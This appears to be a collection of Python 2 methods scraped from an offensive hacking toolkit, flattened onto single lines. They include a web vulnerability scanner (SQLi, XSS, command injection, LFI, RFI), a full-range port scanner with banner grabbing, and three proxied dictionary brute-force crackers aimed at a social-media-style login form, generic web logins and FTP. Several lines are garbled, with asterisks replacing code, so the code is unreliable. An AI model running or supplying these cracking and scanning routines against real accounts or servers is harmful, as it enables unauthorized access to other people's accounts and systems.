def scan(self): global br global vuln_links print "\n[+] Target: " + self.target if self.verbose == 1: print "[!] Checking proxy..." if self.proxy != "": hst, prt = parse_address(self.proxy) pr = proxy(hst, prt, self.proxy_type) if pr.set_browser_proxy() == True: print "[+] Proxy: " + self.proxy else: print "[-] Invalid or dead proxy" else: print "[-] Proxy not set" print "\n[*] Checking anonymous FTP login..." self.results = "Anonymous FTP login:\n" self.results += self.FTPScan() print "[*] Checking vulnerables links...\n" self.grab_links() if len(vuln_links) == 0: self.results += "\nNo vulnerable links found" print "[-] No vulnerable links found\n" else: if self.verbose_mode == 1: print "[!] " + str(len(vuln_links)) + " vulnerable links found" print "[*] Checking SQL vulnerability...\n" self.results += "\nSQL vulnerability:\n" self.results += self.SQLScan() print "[*] Checking XSS vulnerability...\n" self.results += "\nXSS vulnerability:\n" self.results += self.XSSScan() print "[*] Checking command injection vulnerability...\n" self.results += "\nCommand injection vulnerability:\n" self.results += self.CMDScan() print "[*] Checking LFI vulnerability...n" self.results += "\nLFI vulnerability:\n" self.results += self.LFIScan() print "[*] Checking RFI vulnerability...\n" self.results += "\nRFI vulnerability:\n" self.results += self.RFIScan()
def scan(self): print "\n[+] Target: " + self.target if self.verbose == 1: print "[!] Checking proxy..." if self.proxy != "": hst, prt = parse_address(self.proxy) pr = proxy(hst, prt, self.proxy_type) if pr.set_socket_proxy() == True: print "[+] Proxy: " + self.proxy else: print "[-] Invalid or dead proxy" else: print "[-] Proxy not set" pr = proxy("", "", "") pr.set_no_proxy() print if self.verbose == 1: print "[!] Scanning target...\n" for port in range(65535): try: if pr.connect(self.target, port) == True: pr.send("HEAD / HTTP/1.0\r\n\r\n") banner = pr.recv(1024) self.results += "%s/tcp open %s\n" % ( port, self.porttoservice(port)) print "[+] %s/tcp open %s" % (port, self.porttoservice(port)) if banner != "": print banner self.results += banner + "\n" except: pass if self.results == "": self.results = "No open ports found" print "[-] Failed to connect to target" print "[-] " + self.results + "\n"
def crack(self): print "\n[+] Target: " + self.target if self.verbose == 1: print "[!] Checking proxy..." if self.proxy != "": hst, prt = parse_address(self.proxy) pr = proxy(hst, prt, self.proxy_type) if pr.set_browser_proxy() == True: print "[+] Proxy: " + self.proxy else: print "[-] Invalid or dead proxy" else: print "[-] Proxy not set" print if self.verbose == 1: print "[!] Connecting to target...\n" br = browser() try: br.open(self.login_page) if self.verbose == 1: print "[!] Checking wordslists..." passwords = open(self.wordslist, "r").readlines() if self.verbose == 1: print "[!] Attack started...\n" for word in passwords: password = word.replace("\n", "") print "[*] Trying: " + password br.select_form(nr=0) br.form['email'] = self.target br.form['pass'] = password resp = br.submit() if "login_attempt" not in resp.geturl(): self.results = "Password is " + password print "[+] " + self.results break except: self.results = "Failed to crack password" print "[-] Failed to connect to target" print "[-] " + self.results + "\n"
def grab_links(self): print "\n[+] Target: " + self.target if self.verbose == 1: print "[!] Checking proxy..." if self.proxy != "": hst, prt = parse_address(self.proxy) pr = proxy(hst, prt, self.proxy_type) if pr.set_browser_proxy() == True: print "[+] Proxy: " + self.proxy else: print "[-] Invalid or dead proxy" else: print "[-] Proxy not set" print if self.verbose == 1: print "[!] Connecting to target..." br = browser() try: site = br.open(self.target) src = site.read() soup = BeautifulSoup(src, "lxml") links = soup.find_all('a') if self.verbose == 1: print "[!] Found %d links\n" %(len(links)) for link in links: print link.get("href") except: self.results = "No results found" print "[-] Failed to connect to target" print "[-] " + self.results + "\n"
def crack(self): print "\n[+] Target: " + self.target if self.verbose == 1: print "[!] Checking proxy..." if self.proxy != "": hst, prt = parse_address(self.proxy) pr = proxy(hst, prt, self.proxy_type) if pr.set_browser_proxy() == True: print "[+] Proxy: " + self.proxy else: print "[-] Invalid or dead proxy" else: print "[-] Proxy not set" print if self.verbose == 1: print "[!] Connecting to target..." br = browser() try: br.open(self.login_page) if self.verbose == 1: print "[!] Checking wordslists..." usernames = open(self.userslist, "r").readlines() passwords = open(self.wordslist, "r").readlines() if self.username != "": for word in passwords: password = word.replace("\n", "") print "[*] Trying: " + password br.select_form(nr=0) br.form[self.user_form] = self.username br.form[self.pass_form] = password resp = br.submit() if ("login" not in resp.geturl()) or ("attempt" not in resp.geturl()): self.results = "Password is " + password print "[+] " + self.results break else: for user in usernames: username = user.replace("\n", "") print "[*] Trying username: "******"\n", "") print "[*] Trying password: "******"login" not in resp.geturl()) or ( "attempt" not in resp.geturl()): self.results = "Login is %s:%s" % (username, password) print "[+] " + self.results break except: self.results = "Failed to crack password" print "[-] " + self.results
def crack(self): print "\n[+] Target: " + self.target if self.username != "": print "[+] Username: "******"[!] Checking proxy..." if self.proxy != "": hst, prt = parse_address(self.proxy) pr = proxy(hst, prt, self.proxy_type) if pr.set_socket_proxy() == True: print "[+] Proxy: " + self.proxy else: print "[-] Invalid or dead proxy" else: print "[-] Proxy not set" pr = proxy("", "", "") pr.set_no_proxy() print if self.username == "": try: if pr.connect(self.target, self.port) == True: if self.verbose == 1: print "[!] Checking wordslists..." usernames = open(self.userslist, "r").readlines() passwords = open(self.wordslist, "r").readlines() for user in usernames: username = user.replace("\n", "") print "[*] Trying username: "******"\n", "") print "[*] Trying password: "******"USER " + username + "\r\n") pr.recv(1024) pr.send("PASS " + password + "\r\n") r = pr.recv(1024) if "230" in r: self.results = "Login is %s:%s" % (username, password) print "[+] " + self.results break except: self.results = "Failed to crack password" print "[-] " + self.results else: try: if pr.connect(self.target, self.port) == True: if self.verbose == 1: print "[!] Checking wordslists..." passwords = open(self.wordslist, "r").readlines() for word in passwords: password = word.replace("\n", "") print "[*] Trying: " + password pr.send("USER " + self.username + "\r\n") pr.recv(1024) pr.send("PASS " + password + "\r\n") r = pr.recv(1024) if "230" in r: self.results = "Password is " + password print "[+] " + self.results break except: self.results = "Failed to crack password" print "[-] " + self.results